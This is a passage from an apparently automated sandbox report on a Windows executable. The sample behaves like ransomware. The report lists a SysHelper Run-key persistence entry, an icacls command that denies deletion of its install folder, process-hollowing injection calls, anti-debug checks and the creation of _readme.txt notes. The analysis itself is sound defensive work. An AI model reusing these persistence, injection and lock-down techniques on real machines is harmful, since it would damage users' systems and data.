          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00868F05 push ecx; ret 1_2_00868F18
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00428565 push ecx; ret 5_2_00428578
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007E8F05 push ecx; ret 8_2_007E8F18
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_00868F05 push ecx; ret 9_2_00868F18
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00428565 push ecx; ret 10_2_00428578
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040FC9D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_0040FC9D
          Source: initial sampleStatic PE information: section name: .text entropy: 7.96151049011
          Source: initial sampleStatic PE information: section name: .text entropy: 7.96151049011
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeFile created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00427D6C RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00427D6C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00401178 rdtsc 10_2_00401178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,5_2_0040E670
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,10_2_0040E670
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_1_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_00410160
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp, NZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00403D1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00403D1C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_0042A57A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040FC9D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_0040FC9D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0041388C CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0041388C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00401178 rdtsc 10_2_00401178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00840042 push dword ptr fs:[00000030h]1_2_00840042
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 8_2_007C0042 push dword ptr fs:[00000030h]8_2_007C0042
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeCode function: 9_2_00840042 push dword ptr fs:[00000030h]9_2_00840042
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00404C0B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00404C0B
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040ACAA SetUnhandledExceptionFilter,1_2_0040ACAA
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_004038AF _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004038AF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00403D1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00403D1C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00405246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00405246
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004329EC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_004329BB SetUnhandledExceptionFilter,5_2_004329BB
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004329EC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004329BB SetUnhandledExceptionFilter,10_2_004329BB

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeMemory written: C:\Users\user\Desktop\NZPC0PFaC0.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeMemory written: C:\Users\user\Desktop\NZPC0PFaC0.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeMemory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeMemory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeMemory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5AJump to behavior
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,1_2_00840110
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' Jump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeProcess created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeProcess created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStartJump to behavior
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,1_2_0040B476
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_0040D028
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0040D8C2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_0040D4CD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,1_2_004064DB
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_0040CDD0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_0040D5E4
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0040D9EA
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0040D983
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,1_2_00413249
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,1_2_0040F650
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,1_2_0041327D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,1_2_0040D67C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_0040DA26
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_0040D6F0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_00404748
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_0040C762
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_004133BC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_004335E7
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,5_2_004387C8
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,5_2_0043884E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,5_2_00432B6D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,5_2_00437BB3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,5_2_00437E27
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437E83
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437F00
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0042BF17
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,5_2_00437F83
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_00432FAD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_1_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_1_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_1_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_1_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_1_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_1_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,10_2_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,10_2_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,10_2_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,10_2_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,10_2_004387C8
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,10_2_0043884E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,10_2_00432B6D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,10_2_00432FAD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,